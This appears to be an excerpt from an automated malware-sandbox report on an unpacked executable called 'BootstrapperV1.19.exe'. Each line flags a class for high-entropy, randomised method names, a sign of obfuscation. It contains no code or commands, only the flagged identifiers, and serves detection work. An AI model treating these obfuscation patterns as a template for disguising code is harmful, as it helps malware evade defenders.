                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, wUwAQUGoZtL37YjvxI3.csHigh entropy of concatenated method names: 'e93GQOl3pd', 'YEfGaIJk6B', 'PbPGxu34lh', 'HI6GzDCC2Q', 'R4gciQJo4Q', 'EhScdegriD', 'feHcwTLGES', 'FREhSod06ALPoNJZmsrT', 'zBChvkd0bjNf2Per2FuM', 'siP5a1d0hsliDjG4TA1P'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, ByL6IQVXXZrh0SceR8N.csHigh entropy of concatenated method names: 'IH4Va7EDwy', 'wCxVxC7wsj', 'MBpVzCjth6', 'VEv5iHJUwP', 'NJq5dmATvi', 'WcS5wHSc6m', 'Ngw52OBmPO', 'g7O5JEHSrw', 'gSl5GLncfZ', 'uh25cc8wSj'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, pEpn0Uydwuhg28FHsex.csHigh entropy of concatenated method names: 'rC9', 'method_0', 'oUDdlR3B7db', 'geLdlj3uASA', 'yTLPOndEOpow0M6lSsVC', 'fAqiHedEBAagGMZdH7RW', 'jr6wvkdEUKJRivyYwj3J', 'oSshgddEW9oaLF5paVgU', 'BhIPRsdErx3NK2LY2ncW', 'TL57P6dEoqRJfUUJtms1'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, orrItn7OSYL3BKHpDGE.csHigh entropy of concatenated method names: 'akM7UgEIIF', 'rwm7WFDu03', 'VhV7rNKsDX', 'tQx7yjdBBEgu4k2eMm0q', 'fC8x8hdBKGqyfuOHXUUH', 'xt2TuYdBOgXiHUJt8sZI', 'bsgIYRdBUVC7oITpQ1tJ', 'c39EixdBW0d8DdRbUWnx', 'MdIao8dBr7pftZ5dq2uv', 'e4VDGTdBo3CdDM8b3xGt'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, FYX4aOlGSdRD5CQq1v7.csHigh entropy of concatenated method names: 'O3I', 'P9X', 'C61dJSpTZUK', 'vmethod_0', 'imethod_0', 't6ZXqydsF124HgiQFa0x', 'XNXRrGdsvmU8Oi53cOt2', 'VnKuRxdsh1o30f94APJr', 'JoTnQPds6dvShYEAd9kf', 'YQskXKdsb4SrgvwvBa5Y'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, aydgOIZ5uyteP8hL0rI.csHigh entropy of concatenated method names: 'DeCZ91ePSp', 'ymbZAbfiGu', 'kAGZK22Cf5', 'uYYZOPF4GK', 'd8sZBYpTbh', 'oSKZUBVjf7', 'JmaZWSE7B2', 'sAVZrbOGiE', 'u5qZogqE1l', 'uISZ15FqsL'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, EfXDmijhlMXXi1yjthp.csHigh entropy of concatenated method names: 'pAJjjivhCs', 'FgKeV3d5xWA4OU3nKlsI', 'm9Ac6wd5zU8Mp5kveJKH', 'RxWQEAd5QYtx3V5kBmGH', 'dwtq9rd5aDw6dXn84Wpv', 'fyY8ajdEi2ZWCxIq9fIH', 'CVMj6UYp9Z', 'Se2rH8d5oM4AdGC5mNq8', 'cdHVdAd51nYPcnlBTH02', 'OOZOSFd5Dk6x7Pvrkdsy'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, loak9tDTx8UxwNx0SXy.csHigh entropy of concatenated method names: 'method_0', 'h59', 'R73', 'MrbD4rjaBC', 'W1BqZbdNDJjOR88mGVQV', 'DQIIXjdNLJL0Ko7qwjab', 'NTdKtPdNN8Geuahw8vtM', 'QXrUrPdNXM0uLAX0tgVS', 'jApUCLdNQLlgbXg5LdoJ', 'T2861ZdNaAsZhN56VnpW'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, yV4CUEeoo52WkeWC1ZZ.csHigh entropy of concatenated method names: 'uuXeDMOVIU', 'uVoeLgHtaQ', 'sGmeNW655E', 'fyPeXavRIR', 'JIGeQ01Owk', 'RKpv58dANDtwPc6QkTR1', 'msRAsXdAXny0CueOdN3C', 'JUUjkWdAQ2kdCl2yTBl6', 'XcROWRdAavJLM4v6ZE3H', 'VUI8YWdAxqhC48bnXneK'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, eTPltgCT8NS7aqQrvfj.csHigh entropy of concatenated method names: 'NlrC4k7Yin', 'ABaCsapj7L', 'PObCnSpy0F', 'ypoC3xgL6J', 'zteCmbm91o', 'fHZCC8tJ3C', 'yV3CVvMJSM', 'gcjC57N3hx', 'kOPCEL2pnN', 'bslC9ysoEj'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, EbEKDRZTNxx4QvphlqR.csHigh entropy of concatenated method names: 'DB4', 'method_0', 'method_1', 'method_2', 'method_3', 'method_4', 'method_5', 'A47', 'fC4', 'aK3'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, NyHUmVjA6wwfYZYxlpK.csHigh entropy of concatenated method names: 'TagjO4edcT', 'Lc8jBJmKTe', 'abljUk95ur', 'jjYBDqdESBQOD9YODiWX', 'FG5T7jdEekZas5JLIXMC', 'xanyiOdEHLGabC255Tgq', 'sZhpiAdE8dqPeTMOY8PV', 'sUmLjndEgqZK6oAK7piU', 'TkXUBMdE7MwmbWtvk1xi'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, hR3CLFzffFD3QIInCq.csHigh entropy of concatenated method names: 'j8XddAqBwe', 'NNud2I7Vhq', 'a25dJy7S94', 'DlldGGVCGl', 'FjwdcrPLG3', 'OdndkKNB7O', 'gHudMN9oLn', 'bZ7dgmdgMDVmLcI5lA2C', 'lrONiKdgfrIka86ZRZjF', 'xA7PZjdgPrx7hpCcHwgU'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, FEaxvtRDwjTdbLI3Wqn.csHigh entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'jRBdlvGUv4y', 'MNtdJONXRvO', 'F3Puued5ZkHYeNFirym9', 'x8imbpd5YPMtRksKgYqp', 'lON3vmd5TqnPlvH6yVSK', 'Mwb6VOd50P8D7o7OFvNl', 'fM8EGed54XSd1VpKkGxf'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, jf1scMRCdWpEXADMYhS.csHigh entropy of concatenated method names: 'EaKROkdaRI', 'ImuRBeNqsa', 'GstRU55txo', 'vV6VfDd5yi4L07AxEf4g', 'jZPLyjd5R1EdNVEZUPki', 'oIwVGMd5jkiTiCy7E8gi', 'T0yR5h7Qay', 'OuoRE2rf3V', 'KraR9Ax2iu', 'xci2YNd5bYGRcEs44eAE'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, Er4GOj2rNOLEknahGv8.csHigh entropy of concatenated method names: 'nD2J2hHck3', 'Fm6JJ4pMUU', 'akFJGO3bgX', 'vqw1lVdYMSx1DqTom8jV', 'kG4AbxdYkfM3aoVGjvBG', 'RjWfHldYl8NryPq9N3wx', 'lsbvwJdYfCuK36aQApp3', 'pS3JPbQrj4', 'wP1MhpdYqeF0w4QLs7CR', 'ESG1CidYvnsAvy0BrYDy'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, YyUFRcgEUIxexsDWZSj.csHigh entropy of concatenated method names: 'YWOgaeB02B', 'fd3gzbnG1a', 'rTBgA1OriZ', 'dM0gKlBkuV', 'FklgOeLJW6', 's2HgBs6Qru', 'lPDgUc64vp', 'c05gWUEvGW', 'MDDgrBwwAd', 'Xj7go5mkYv'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, zFEf6YkE0TMRWDU97ss.csHigh entropy of concatenated method names: 'RkkkNahRtT', 'n6YkXihCyN', 'I4dT1adskIwsw7splHZo', 'TLGVNKdsGGNARB7UHt5I', 'cFtecMdscw06DGFVn0Tu', 'QLVNWDdsljfR67fbcOhp', 'KEukAivcw4', 'oaykKNWZIO', 'SEJkOOB0Vw', 'LUfkBZuoIn'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, JT62JOjWc9uMeTVf07m.csHigh entropy of concatenated method names: 'NUJdlbuN9Ol', 'g1LjoXTdWb', 'iJAdltt4V6i', 'uQmD59dE0JOYe5nlDnwf', 'yKIaIBdE4FhkB1ZXxguW', 'vh84uAdEYChIpaqpu0S7', 'yWSXDTdETBop7CNW86N2', 'I30UsudEsRYGs87c47es', 'JqQapUdEnQXYRMvX87c9', 'NhR2QNdE3qsGWUX4YntC'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, khav98MeJKByOr3MWtX.csHigh entropy of concatenated method names: 'I6wCMXdmBXdLZ6KUWbMr', 'MXM7VrdmKynWY7wFrPBQ', 'SKeWPtdmOmbFwfWJtcSn', 'sRWme0dmUNqmilT425WL', 'unJhxRaXOg', 'R4raj5dmrhZZid09LnZb', 'PasrtNdmoU5AdWWXyvUj', 'CUWboXdm1m2UkZxrIxDq', 'xk4FdKQf2h', 'AblsWPdmXQqD6UO8yIis'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, ay5DJ3TQEZmnX7x8PQF.csHigh entropy of concatenated method names: 'Jw5TxqoA5D', 'JrPTzuXyIM', 'aU60ifqfWt', 'Pjy0doo0x4', 'jcn0wd53CT', 'aRN02JT2XA', 'Rpx', 'method_4', 'f6W', 'uL1'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, t50OvVlOQ3yDHAC6JcS.csHigh entropy of concatenated method names: 'mYYlNT7xEb', 'Yp7cl8dnqDLibJh4GcGC', 'JMMAMYdnvwS6eTQ7ONmg', 'F0btoSdnh7fJQUC1LKs5', 'P9X', 'vmethod_0', 'zU6dJgZsu3f', 'imethod_0', 'Gw03ZXdnMAI3n6nMHS6s', 'RnH8VndnkYT7DwMjILYw'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, v9AUSXkdhdt4QKnuNxW.csHigh entropy of concatenated method names: 'juLk24pjcu', 'X9ukJuxVqo', 'pGEkGTu7TQ', 'p9hGELd4fdn1ueFmgy0R', 'AyrCs3d4lEyHVAURdbFh', 'KaSQemd4MuuAIDq53QQg', 'N7di5wd4PYZt3vNeKg0k', 'LoHpS1d4qlbZtLbwdDP9', 'QKVVjfd4vbfoqal32Spw', 'CixjSYd4hJxPJLMMXtZj'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, OP96RIg2EGMkavblGoy.csHigh entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 'WStgGQPXSt', 'Write', 'DcegcG9vBQ', 'QUIgkps8mR', 'Flush', 'vl7'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, OjHp06GMW9cD1ZIZXtx.csHigh entropy of concatenated method names: 'Rpx', 'KZ3', 'imethod_0', 'vmethod_0', 'UqhdlGufL3w', 'RdIdJdHUcs6', 'jsV8EldTjg10p1tGoUlF', 'EgAcLFdTylfE3nukL8Dt', 'qVQcGydTISJwtes0Yq4d', 'IqnvyFdTp73BSQNJ3UOK'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, FcGsnWyPsZc89kjZ0T2.csHigh entropy of concatenated method names: 'Rrr', 'y1x', 'pTwdlIFkwTZ', 'aXZdlpMcTr3', 'ogxldmdEzFameoZ0YAac', 'zonkAcd9i19ixTw9A5bH', 'EHaFItd9dLELtgto9P0T', 'Ms9uxUd9wDDO0AMPLfjw', 'kRNPIMd92nHkCXHMvXkm', 'Wy3BQFd9JqpEjWYZMcV7'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, vFKDAHNTFQP6MkldX87.csHigh entropy of concatenated method names: 'EYiN4Mgygt', 'pjoNsANVVL', 'rLJNn9mJxu', 'GyXN3rjedZ', 'Dispose', 'vpP0xFdQYDCOmjUvhRx1', 'gc7YAsdQ7c3Guaqe2TKU', 'OUspJPdQZ2FccvTQQnYm', 'biyXifdQTdBPMBUM6GRa', 'rMt7l2dQ0nV9LJU7LQgh'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, EeaICIlf9e3B4G7DvJ9.csHigh entropy of concatenated method names: 'giWlqY9YZM', 'Xo8lvulIOm', 'rHLlhbr7o9', 'bFeY4fdsyYlnFJaZ5gFR', 'YTEoPadsRKk47lS2h6Ip', 'IHDEGOdsjrAuc7JFsdgF', 'PUsgfjdsIoQHih72tNCj', 'yYYCwLdspywDvkU6SWFN', 'uHOxx5dse5AYgykAyh4Q', 'Tc0xNSdsHR8UqE6IX2q8'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, jkZxXcdu6Iht96a3jQm.csHigh entropy of concatenated method names: 'RTM', 'KZ3', 'H7p', 'eeS', 'imethod_0', 'XbG', 'fO3dkz9xsvJ', 'RdIdJdHUcs6', 'GL4TrldgeZUaDRow22mw', 'snj3EodgHtXbybSeEtXT'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, qbPQRhMwJitwKnXPc4e.csHigh entropy of concatenated method names: 've9MJqcPeO', 'GZXMGeOmhx', 'xvKMcBblgA', 'REhMkBXhaG', 'UFBMl62TdN', 'L0RMM4qrKo', 'PZPMfYXNvb', 'on0MPTC3T6', 'MMEMqHyabt', 'zFIMvE8sOP'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, GMK2LDcEY7p5xj7C0g1.csHigh entropy of concatenated method names: 'lQAcNVPr6s', 'bZpcX4Ewg9', 'gSJcQYih9X', 'lG4ELad4G3QTcA3edVqN', 'kV7mORd4cyTKifXB6fqw', 'OqomQnd42Jauw8MbpaJQ', 'pGNBhnd4J717D01jQtcl', 'p3vcAsnCi2', 'WdscKOG6hw', 'no0cOZmwXu'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, H7jhjHNv8pAZEB7ciLL.csHigh entropy of concatenated method names: 'HbjN6cZn4s', 'X62NR53r8v', 'm1aNIBt8bC', 'eUVNpCXgVb', 'lVBNeSGZDa', 'VIJNHCcuat', 'cQENS3uTYZ', 'QqwN8y6DZX', 'Dispose', 'ahnkIBdQIAVEVg5qbDgE'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, XBuOgyl5H5jbr8ZX7y8.csHigh entropy of concatenated method names: 'P9X', 'Yf5dlqpRwvl', 'imethod_0', 'qeKl9qXkLR', 'plAt6Mdnd0P742N1AkJG', 'E18aaSdnwG3tEXGaFZMp', 'ufbiLpdn29wOnUwpTHgN', 'bsI2KAdnJyp7kxT2rVKO', 'M6lYVfdnGXIyD1KOmahv'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, PLEunsaVTgxTC7esIAM.csHigh entropy of concatenated method names: 'EQCdc0CZhit', 'GMFdc4autED', 'VwZdcswxW2X', 'rFndcnpbOQS', 'nYfdc3ZFgFQ', 'JHidcm0SSUh', 'ooKdcC5ogBY', 'dr5xGyNpMx', 'ntjdcVI0bdG', 'whidc57Nr00'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, UK3l9KMhXcMyaS2MeSI.csHigh entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'YTSmdidnCmfvLkpU0Eig', 'L9pB5cdnVnGw0qFIMRSg', 'TrYPEAdn5t9kiPiCsfL6', 'QFeM6jHPof'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, V66tPwIvgKLx6WLHXAJ.csHigh entropy of concatenated method names: 'g7HedS2753', 'N17hkSdATAHedBxyhPTx', 'WyGssRdAZfqO12OvXmfu', 'QEGmp4dAYmwAOdTiE0Hm', 'gsdDSRdA0rbPbrEeh03h', 'F8hIFRVv3d', 'fcnI6ivofo', 'R2mIbrH0si', 'lJqIt84lbW', 'cW7IuPxp06'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, zX9bkRJVRjNjNGQ8QxI.csHigh entropy of concatenated method names: 'SWpJaKIxCj', 'LiesgndTkxE4o2gZLHqQ', 'p2nFCgdTlalwG2pxXyNr', 'Fj0fT7dTGZcPYfNsipYP', 'BfBdmJdTcbBl5PB5HSs8', 'IAxk9udTqoelGMC16YTB', 'KILVvedTfSaaD5jqjUgB', 'YGIAewdTPmjH4jHYcCdx', 'VNys4qdTvqjnLMTkPZWb', 'vIDGcd3JgV'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, nmHayoR7JAXjUvgvraw.csHigh entropy of concatenated method names: 's8bR3NyY5C', 'WFYUymd5hLRV5ft1t28p', 'MD5ssid5qCEI4D6A20g7', 'AlqunJd5v0NBgq8O6Q0I', 'F3GwWXd5Fni4vRSH3fer', 'mRARYZaeXk', 'yXwRTYQa4W', 'eWKR0XWfHE', 'E7HTlTd5lI4lItxeXH7v', 'bvL3ncd5MCT644nJ0l2p'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, i2xKQZy6LWXBs45htlM.csHigh entropy of concatenated method names: 'h3GYYqd9Iw0GtQ8ajRM4', 'LvK723d9pDEvLPnseali', 'VIOmXRd9eMMxo6eJRqwS', 'mnLhN3d9jrfK5JCJYVeh', 'vvNyBed9yl3LOi5coCB3', 'method_0', 'method_1', 'indytMkwCD', 'yP4yuZYQE4', 'BSRyRakilt'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, VegtO5jCdOgBIJmSpaq.csHigh entropy of concatenated method names: 'N2N', 'TwQdlFktXqi', 'dKNj58Tu94', 'cKbdl6DrDEJ', 'OKltWfdEjfQMgR94qNoy', 'HlmwpldEutYBZWRRMCpf', 'S3nE91dERqdRUM09mZJL', 'bBM1IpdEyxB0tKC3l5Is', 'OhOPikdEILGDUcaD2NKg'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, xGLaw6lgGrNw7bllSAg.csHigh entropy of concatenated method names: 'NfxlZQpUCq', 'Yx2lYdMcNV', 'QirlTSep4J', 'UrOl0Un0a3', 'amEl4p0pLL', 'EBplstJqbO', 'pWpU7yds1EjK0KIW6FPI', 'XMECJXdsD1ZIA68OFH8A', 'S6yeqndsLX98GoGKUms8', 'kFFM44dsN4OQe3XDcqjp'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, mjhLR2CMZWkQO0T3JbG.csHigh entropy of concatenated method names: 'CJiCHuEGdB', 'r3TJUddDSZlU6dDX92it', 'd6UGIidD8F5Wc4O6Ujsk', 'XTP28RdDeaR33GKpv5Vn', 'pajHaIdDHb3qYrj24ctv', 'IPy', 'method_0', 'method_1', 'method_2', 'vmethod_0'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, JlDk22auikPg5UGbLQT.csHigh entropy of concatenated method names: 'lVsaZ78Onw', 'iqqaYtxujf', 'eWjaTOOUbU', 'Hiqa0XSTqL', 'FmAa4Xqkfn', 'DSyasJksAg', 'EvEanbAD71', 'eq6a3kjpxg', 'ILhamX7Qk8', 'GbQaC4s5C4'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, B2NvOMXtqVYtZCRbgnc.csHigh entropy of concatenated method names: 'iwM0ygdaRZjMDwfTIMQD', 'Ooh15mdajp7V070IkIh5', 'OihQDQMfs5', 'vEfVOydaeB9gu5sj3rYh', 'eMJU00daHV1Jc3QgrGvM', 'HmhNWfdaST87w49vU2Co', 'XWsbPpda8ww1tShwSIg2', 'xYEYJBdagVtrdJ0I5osS', 'deOJD4da7TGCTmPBHFVp', 'fvRgV9daZHCnj90AeSJO'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, QQBOQAsmMbpqfSQE3Kc.csHigh entropy of concatenated method names: 'q13', 'Sw1', 'method_0', 'pOosVfuC5e', 'L0Qs52dQqQ', 'SKHsEsArDe', 'Y6cs95D3O6', 'PXJsAMrUfW', 'ErksKjkIKV', 'pngBUFdoQXWXWZOyvsq2'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, m6xtDbHAmLO2y9IER4J.csHigh entropy of concatenated method names: 'a99', 'yzL', 'method_0', 'method_1', 'x77', 'GrsHOmT8pb', 'gpOHBfviuN', 'Dispose', 'D31', 'wNK'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, doLl3eVTPcF7rnjVMeV.csHigh entropy of concatenated method names: 'gTSV4xOl5F', 'M8WVsvwxWg', 'n4rVn0N3Ik', 'AywV32nwhm', 't5EVm3w8ce', 'RFXVCxla9w', 'LKMVVeRiTk', 'QBmV5AJpSs', 'bfaVEEyvfI', 'BhpV9axX35'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, EalZ7BlbUO2J6AS5b4Z.csHigh entropy of concatenated method names: 'NYjljaWZmc', 'NAQrt6ds4iqFqDhHvH8x', 'z6Cm2hdss9ZneKM4EcYb', 'eAFlhMdsnO6jvLZCIl28', 'AdMlueSPnr', 'eJ1swNdsZjOZ4IdmFNne', 'M33eJQdsYVX1wfs7DsGc', 'tbs51CdsTMo5DVyVkRBU', 'vnHH64dsggIuAfp5rVIy', 'Rg5ynTds7YNGEc2g0KmN'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, U4KgmN7xttD1DJcM8UX.csHigh entropy of concatenated method names: 'dmiZiVYSRr', 'SjFZdZHsEI', 'JrbZwVd7wn', 'akxZ2Cfc0v', 'BtnZJdx7na', 'fk7ZGAMZc1', 'qDwMiOdUwOl9euexLq5d', 'Gp2mFpdUic8k22v2nydN', 'sesDZXdUdZ9cDQ6Du5H7', 'fc2019dU2ByDB920Q4yg'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, BrafOi0ya2QydcUhBab.csHigh entropy of concatenated method names: 'lFO4hLEqc8', 'RVvEpHdraC8187wOxDOb', 'R4vb8ldrXCL2jtiDPNoL', 'Ri580OdrQ77tk5iFUlac', 'eyTRvGdrxvG8l5NthW4D', 'kt5', 'aMo0pTeowV', 'ReadByte', 'get_CanRead', 'get_CanSeek'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, qaWcFq4n4HNWO8L1XHI.csHigh entropy of concatenated method names: 'Close', 'qL6', 'Nf54mQ4Svt', 'kph4CAdQxW', 'zjD4VWObcE', 'Write', 'get_CanRead', 'get_CanSeek', 'get_CanWrite', 'get_Length'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, yySYoC3nd1ijaqoEl2D.csHigh entropy of concatenated method names: 'Dispose', 'MoveNext', 'get_Current', 'Reset', 'get_Current', 'GetEnumerator', 'GetEnumerator', 'tQVwCtd1ED0dq5J9yjjg', 'zJoWl2d1VgGaQM8Njur6', 'Oacqdid15Lxrb54wBNXL'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, yLIb7h4rWHmVLUXo7uJ.csHigh entropy of concatenated method names: 'mA441i5XN9', 'k6r', 'ueK', 'QH3', 'UrO4DS22NO', 'Flush', 'xiE4La825r', 'CUh4NP3sod', 'Write', 'yQP4XAtlMQ'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, MIvnTjwTLZARjr44QSO.csHigh entropy of concatenated method names: 'sxCwEGIYqX', 'aA4w9RBBvv', 'VTnojrd7E2DmhTnarguc', 'dDt7k5d7V0PvQcCRxKU4', 'iTEPeDd75jFy2avnO08G', 'iSUwB98pHY', 'V2627Sd7OqvY71xTZbSb', 'PELVkyd7AQ741fsReymY', 'NrGxJ1d7KQjxOVFR1jBH', 'RhsHY8d7B6pSlRjtAqmH'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, PfNvPu8Tb89hDJp81qR.csHigh entropy of concatenated method names: 'method_0', 'xGy84J6693', 'kGa8suN0bX', 'uQ88nRqIP2', 'Yjd83KPIWs', 'D1b8mPPAby', 'Ktf8CwVvOu', 'D5B0C8dO7wGNZEOYKFnZ', 'DNEXjEdO85pIPEgmrLh3', 'ubtqjHdOgS47G6qyGPKP'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, s2aXaH8P2WkOyOTibFy.csHigh entropy of concatenated method names: 'J168vxjr7R', 'Lsx8hbTQ4E', 'wjq8F9iSb4', 'rCu86bPoqH', 'll08bMbN8F', 'M0NMcKdOtxyg8OLpLnCZ', 'JqQtuOdO6rST6L8FhOTi', 'HSZFrTdOb7dJr1d444ul', 'p3R2TcdOunJK7vCk7vFB', 'wBW0TmdOR6WKsyroxDur'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, Ta0XuJXiMFlHqPlBFM8.csHigh entropy of concatenated method names: 'YDxXJ69STs', 'yoNXG60Oku', 'EnqJrfdQzGrSZYhflsgV', 'BZwoCvdaih1g5Z0BDTHW', 'xqfZWgdQaqBPRL44tVeE', 'zEu9BsdQxaKYSSvKnrvg', 'vg99vqdadcksWd9gELEx', 'EB3ZWFdawJ7vMEAQE6P3', 'X7VXwDTV6F', 'vsjIxSdQLsEU2AtYAWsr'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, EdrHUOdD3767aAtplnG.csHigh entropy of concatenated method names: 'P9X', 'K8PdNSUFoP', 'stqdliXCtro', 'imethod_0', 'q5KdXM501E', 'HuIBqqdgNXaV0YQU2y6w', 'd5oQjjdgX7VCdD7mN6wb', 'LD3nBMdgDrRPgTuKyFYL', 'EfO9vKdgLBmnW8kU1MWE', 'n5yDdtdgQ7UHjtfvvude'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, zUlUd628L9Le5To4ZdW.csHigh entropy of concatenated method names: 'Bw329v1Gcp', 'zTv2A4cDlk', 'GnY2KOdSqJ', 'OiM2FSdZUGUeVX0vGGFn', 'UgosVidZWWuGDEAH6MTD', 'LYJE1LdZORJMerOGGGK4', 'hQipHtdZBejjjwbq2C80', 'awV27yYpmp', 'QvX2ZGrfeX', 'lWb2YnGtLL'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, YNGwJqSeY8kjoKUU1l6.csHigh entropy of concatenated method names: 'PAsSShSJqL', 'wVYS8AVjhb', 'P25SgMATsr', 'fbiS7Xj0lo', 'QT8SZWH5q2', 'LVHU3edKak4k3WE5SxPf', 'S2PQlsdKXGwJBqCsJyua', 'lN9IeZdKQS3uJOXK3sVm', 'fxnfCadKxiL0UFMW6iYR', 'uQ6JAxdKzDfbGap1xV4C'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, xCO2BB5nJVkEtQqDNLH.csHigh entropy of concatenated method names: 'VZld96dNwyfP0XEsZW8o', 'HdWU7VdN2noavTH0Ughg', 'hRZD7pdNiUFeQPQmOYgg', 'SjiSSqdNdluu7lRwLbGQ', 'xmPP3JdLQeIQjlEpaQM9', 'Ux5jcqdLaVE2qKyZw5N2', 'ABK9LQdLxbhR5Zy6Qtv0', 'HhhJP7dLNpY3grvB3HOd', 'RABrktdLX80jWEZ7GswM'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, UD4mFCGAo7vb0RxfmUt.csHigh entropy of concatenated method names: 'GWrGWAW1F8', 'Hueafbd02PlYMhxcK7gs', 'u61PQ3d0JNTj88gWatox', 'MHtCYMd0GNVE2RAwR5q8', 'MKsTQBd0c1kM5IYiY8Lc', 'U1J', 'P9X', 'VekdJ647Dmw', 'GjLdJb2Jcuk', 'lB0dlkKv4pN'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, j71P4oefSb4Iv6t4d2y.csHigh entropy of concatenated method names: 'vMUeTpgKMB', 'mapeqoQpeg', 'ly9evXavH4', 'bI5eh189Zm', 'quZeFQ02mB', 'NYFe6YSFnu', 'MhFeblqJkt', 'q9ketDIxAM', 'bYaeuN6v3m', 'VegeRrZaCf'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, q09YkfdxV56aurjHkcj.csHigh entropy of concatenated method names: 'KZ3', 'fW4', 'imethod_0', 'U7v', 'JnOdldkrKGw', 'RdIdJdHUcs6', 'VxshPjd7i4HiT08bcDmm', 'DZsASfd7dQt9gIlh9dqZ', 'hTjYBvd7wQheaIPOZNl6', 'kCsgTed72snWpqfej6by'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, rqXwHswGHI7vPCkdsB9.csHigh entropy of concatenated method names: 'jGWwk9xhxL', 'GF3wlTa1j2', 'bRQwMOeac7', 'xsXwfqej8S', 'VPhhvrd76hjhD1mrpp4k', 'k6lPEPd7hUJjYutLgFSH', 'OvYk1Dd7FMWLMPX8mtRL', 'Ue6IcGd7brB2mfjN6oA6', 'yXnoqpd7ticXM6mWjB3e', 'LrrPFCd7uALdyLhwHIPY'
                                    Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, P1ALIswj8p6Y5vEnri1.csHigh entropy of concatenated method names: 'AUSwIU17wQ', 'MIZwpytAfE', 'Pk4PIxd7Z8Zumx7kcfTQ', 'tWcsGGd7gIFesXqItuRJ', 'TkoQbId77OZWjXO7VE3p', 'nfDQSBd7YhxExHha7bpI', 'v2f6Hpd7TCiY9VJUxAjC', 'KX2sJCd70FXPsY3LLZSi', 'A9FtR5d74tTCpZmhtv6t'
